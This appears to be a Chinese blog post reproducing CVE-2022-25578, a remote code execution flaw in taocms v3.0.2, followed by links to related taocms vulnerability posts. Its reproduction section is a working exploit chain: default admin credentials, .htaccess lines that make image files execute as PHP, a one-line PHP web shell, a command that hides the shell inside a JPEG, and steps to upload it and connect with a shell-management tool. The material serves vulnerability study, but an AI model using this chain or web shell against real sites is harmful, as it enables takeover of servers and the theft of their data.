taocms 远程代码执行漏洞（CVE-2022-25578）

风中追风-fzzf

于 2024-07-30 08:46:24 发布

阅读量195

点赞数 2

分类专栏： # 命令执行文章标签：安全

本文链接：https://blog.csdn.net/qq_23003811/article/details/140786841

版权

命令执行专栏收录该内容

31 篇文章 0 订阅

订阅专栏

一、漏洞概述

taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码，默认账号密码admin/tao。

二、影响范围

taocms v3.0.2

三、访问页面

四、漏洞复现

1、登录后台/admin/

2、修改.htaccess

//让.jpg文件以.php文件执行
AddType application/x-httpd-php .jpg

//让.png文件以.php文件执行
AddType application/x-httpd-php .png

//所有文件以.php文件执行，可能会造成程序异常
AddType application/x-httpd-php

3、准备图片马，准备一张普通1.jpg的图片和一句话木马文件1.php，然后使用cmd窗口执行

//1.php
<?php eval($_POST[cmd]) ?>

copy 1.jpg/b+1.php/a ma.jpg

4、上传图片马。

5、使用蚁剑等工具连接图片马。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

风中追风-fzzf

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Taocms 代码注入漏洞（CVE-2022-25578）

千寻的博客

12-01

1773

taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码

taocms中file.php拒绝服务漏洞（CVE-2021-45015）

whh6tl的博客

12-20

1676

taocms中file.php拒绝服务漏洞（CVE-2021-45015）

参与评论您还未登录，请先登录后发表或查看评论

taoCMS SQL注入漏洞（CVE-2022-25505）

weixin_68999845的博客

08-16

762

可以看出，更新函数不过滤id。最后，将 id 引入 updatelist 函数进行更新，可以看出，总共执行了三个 SQL 语句，并且没有一个 id 被过滤。1.进入后台（/taocms/admin/admin.php?POST请求uri：admin/admin.php，参数id后跟随恶意的sql注入语句，其他参数不存在注入条件。1.下载源码到本地 https://github.com/taogogo/taocms。源码下载url：https://github.com/taogogo/taocms。

taoCMS任意文件读取漏洞（CVE-2022-23316）

最新发布

qq_23003811的博客

07-24

189

taoCMS v3.0.2 存在任意文件读取漏洞。1、登录后台，账号密码admin/tao。2、漏洞点在文件管理-->当前位置。

Taocms sql注射漏洞分析

此去清风白日，自由道风景好

09-02

260

首先这个漏洞不是我发现的。只是看到了，无聊中

spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用

10-27

在2022年，Spring Framework 发现了一个严重的远程命令执行（RCE）漏洞，被称为CVE-2022-22965，也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁，因为攻击者可以利用它来执行...

Fastjson代码执行漏洞 [CVE-2022-25845].md

07-09

Fastjson代码执行漏洞 [CVE-2022-25845]

taoCMS 2.5 Beta5

04-30

taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统，是国内最小的功能完善的基于php+SQLite/Mysql的CMS。体积小（仅100Kb）速度快，包含文件管理、数据采集等强大功能，代码手写采用严格的数据过滤，保证服务器的安全稳定！ taoCMS 2.5 Beta5 更新记录： 1、增加远程图片自动下载到本地服务器功能(感谢chengke) 2、支持安装在百度云服务BAE上 3、富文本编辑器xheditor升级到最新版(感谢xiaoniba) 4、增加缓存文件验证，防止直接访问缓存文件 5、安全加固，修复几个安全漏洞（感谢混世魔王和wooyun平台） 6、修复wap留言无法显示的BUG 7、调整跳转进度显示方式 8、改进安装提示 9、评论后台增加分页功能（感谢xiaoniba） 10、后台首页增加通知功能，便于发布紧急更新提示 11、后台首页增加捐赠连接，有你支持，我会更努力！ 12、默认使用xheditor编辑器，不再单独提供精简版 13、在BAE/SAE等云服务器修改模板无需在本地生成缓存 14、修正sqlite的一个特殊字符写入失败错误(感谢Ethan) 15、修复安全问题，感谢shack2、kobin97、yy520 【使用方法】上传程序到服务器，通过网址访问http://网站地址/intall.php,程序会自动提示权限问题，按照要求更改即可。 1、使用sqlite数据库：请在数据库类型那里选sqlite，填写数据库文件所在地址和数据表前缀即可 2、使用mysql数据库安装mysql数据库，请在数据库类型那里选mysql，数据库存放地址添写“|数据库地址|用户名|密码|数据库名”,例如“|localhost|root|root|taocms”，不包括双引号）。安装完毕，建议删除install.php文件。 3、【登录后台（默认用户名admin密码tao），设定taocms所在的网址】附带提供一套blog模板，参照www.taocms.org。【2.4到2.5升级方法】备份data目录、pictures目录、template目录，进入后台综合设置-导入导出，备份所有文章数据（目前评论无法导入2.5系统），安装2.5版，将备份文件导入2.5即可（请做好数据备份，如有异常，请到taoCMS官网论反映）。【版权声明】 taoCMS为开源PHP系统，使用者需声明系统版权

cve-2020-14750.zip9（补丁升级）

05-26

2020年11月2日，Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750，此漏洞可以在没有身份验证的情况下进行远程攻击，也就是说，可以在不需要用户名和密码的情况下通过网络进行攻击。建议大家及时将 Weblogic 升级到最新版本。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。

taoCMS后台getshell漏洞复现

m0_52400001的博客

05-23

1178

简介 taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统，是国内最小的功能完善的基于php+SQLite/Mysql的CMS 漏洞版本 taocms 3.0.2 开始复现 1.由于本地搭建的系统，我们直接输入amdn/taoj进入管理后台 2.进入管理后台以后我们去看左边的功能栏目，找到文件管理并点开，并发现.htaccess文件 3我们点击编辑这个文件，在文件的最后面添加'AddType application/x-httpd-php .php

taocms 3.0.1 本地文件泄露漏洞（CVE-2021-44983）

Flag少侠的博客

07-13

9711

打开靶场熟悉的界面，点击管理信息收集拿到用户名密码点击登录拿到 flag。

TAOCMS漏洞分析

此去清风白日，自由道风景好

09-02

797

这个漏洞不是我发现的，看到了，就拿来分析一下。

taocms 代码注入（CVE-2022-25578）

qq_32445755的博客

06-12

1216

taoCMS是基于php+sqlite/mysql的国内最小（100Kb左右）的功能完善的CMS管理系统.体积小（仅180Kb）速度快，包含文件管理、数据采集、Memcache整合、用户管理等强大功能。 taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。上传.htaccess文件编辑添加AddType application/x-httpd-php .jpghttp://123.58.236.76:32064/pictures/month_2206/2022061

春秋云境 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞

qq_38409397的博客

03-22

420

taoCMS v3.0.2 文件管理处存在任意文件上传漏洞，攻击者可执行任意代码

[春秋云镜]CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞

b1n的博客

08-23

339

taoCMS v3.0.2 文件管理处存在任意文件上传漏洞，攻击者可执行任意代码。